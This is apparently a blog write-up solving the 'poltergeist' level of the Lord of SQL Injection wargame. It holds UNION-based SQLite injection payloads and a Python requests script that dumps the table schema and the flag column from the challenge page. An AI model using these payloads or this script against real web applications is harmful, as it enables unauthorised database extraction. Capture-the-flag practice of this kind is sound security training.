-
Prob
Payload
pw=' union select sql from sqlite_master limit 1,1--%20pw=' union select flag_0876285c from flag_70c81d99--%20Exploit
import requests from bs4 import BeautifulSoup url = "https://los.rubiya.kr/chall/poltergeist_a62c7abc7e6ce0080dbf0e14a07d1f1d.php?" cookie = {'PHPSESSID':'o8k4eis6nm0q904ajkf4t2aiva'} def tbl_name_and_col_name(): query = "pw=' union select sql from sqlite_master limit 1,1-- " res = requests.get(url=url+query, cookies=cookie) soup = BeautifulSoup(res.text, 'html.parser') h2 = str(soup.find_all('h2')) table_name = h2[25:len(h2)-33] column_name = h2[44:len(h2)-14] print("TABLE NAME : " + table_name) print("COLUMN NAME : " + column_name) return table_name, column_name def get_flag(table_name, column_name): query = "pw=' union select {} from {}-- ".format(column_name,table_name) res = requests.get(url=url+query,cookies=cookie) soup = BeautifulSoup(res.text, 'html.parser') h2 = str(soup.find_all('h2')) flag = h2[11:len(h2)-6] print("FLAG : " + flag) if __name__ == "__main__": table_name, column_name = tbl_name_and_col_name() get_flag(table_name, column_name)GitHub - hackintoanetwork/LOS: Lord of SQL Injection WriteUps
Lord of SQL Injection WriteUps. Contribute to hackintoanetwork/LOS development by creating an account on GitHub.
github.com
'Wargame > Lord of SQL Injection' 카테고리의 다른 글
[Lord of SQL Injection] banshee (0) 2022.10.25 [Lord of SQL Injection] manticore (0) 2022.10.25 [Lord of SQL Injection] chupacabra (0) 2022.10.25 [Lord of SQL Injection] cyclops (0) 2022.10.23 [Lord of SQL Injection] godzilla (0) 2022.10.23 댓글 0
HACKINTOANETWORK
WEB APPLICATION BUG HUNTER, PENETRATION TESTER
